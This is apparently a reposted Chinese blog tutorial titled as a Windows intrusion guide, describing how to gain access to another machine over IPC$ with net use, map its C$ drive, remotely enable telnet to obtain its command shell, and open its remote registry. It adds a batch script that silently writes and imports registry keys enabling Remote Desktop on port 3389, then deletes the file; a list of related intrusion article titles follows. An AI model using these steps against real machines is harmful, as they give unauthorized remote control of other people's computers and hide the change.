windows IPC$ telnet 注册表 入侵
来源:互联网 发布:淄博网络推广公司 编辑:程序博客网 时间:2024/06/13 10:09
一. IPC$入侵
条件:能ping通对方的主机, 有对方的一个用户而且这个用户必须有密码
连接:net use \\192.168.0.2
按提示输入对方的用户名和密码
映射盘符:net use z: \\192.168.0.2\c$
将对方的C盘映射为自己电脑的Z盘
命令图:
结果:
二.Telnet入侵
在IPC$入侵的基础上,也就是建立了IPC$入侵后,执行以下操作
1)首先要让对方的电脑开启telnet服务
步骤1:计算机-----管理-----操作-----连接远程计算机
步骤2:找到service,开启telnet服务
2) 这时可以断开IPC$服务了
命令 : net use * /del
3)更改 cmd的属性,使其用管理员运行
步骤:开始----所有程序---附件---命令行----右键属性
4) 连接telnet
命令: telnet 192.168.0.2
然后按提示输入对方的用户名密码登陆就可以得到对方的cmd了
三.注册表入侵
同样实在ipc$连接的基础上,打开注册表,文件----连接远程注册表---输入对方的电脑名称或用户名---检查名称
还没试过:不细说了
附:命令行开启远程桌面(保存为bat运行即可)
echo Windows Registry Editor Version 5.00>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
- windows IPC$ telnet 注册表 入侵
- telnet入侵
- Telnet入侵
- ipc$入侵
- IPC$入侵
- IPC¥入侵
- Telnet高级入侵攻略
- Telnet高级入侵攻略
- Telnet高级入侵攻略
- Telnet高级入侵
- IPC$局域网入侵详解
- 如何防范ipc$入侵
- IPC$局域网入侵详解
- ipc$入侵--- 全面整理
- IPC入侵全攻略
- ipc$入侵教程
- IPC$入侵综述
- 防范IPC入侵
- hashCode
- java 语法糖
- C++ Prime 第十章 关联容器
- 使用mysql关键字做类字段名报的错,花了我一个钟,坑啊
- atoi,atol,strtod,strtol,strtoul实现类型转换
- windows IPC$ telnet 注册表 入侵
- jdbc 连接 mysql 获取 数据集 条数
- ThreadLocal模式探索
- struts2结构图
- php + apache + mysql环境搭建
- ipc telnet 攻击
- 如何用extjs实现海量数据的快速分页显示
- vmware虚拟机上网:host-only
- vmware虚拟机上网:NAT搭建局域网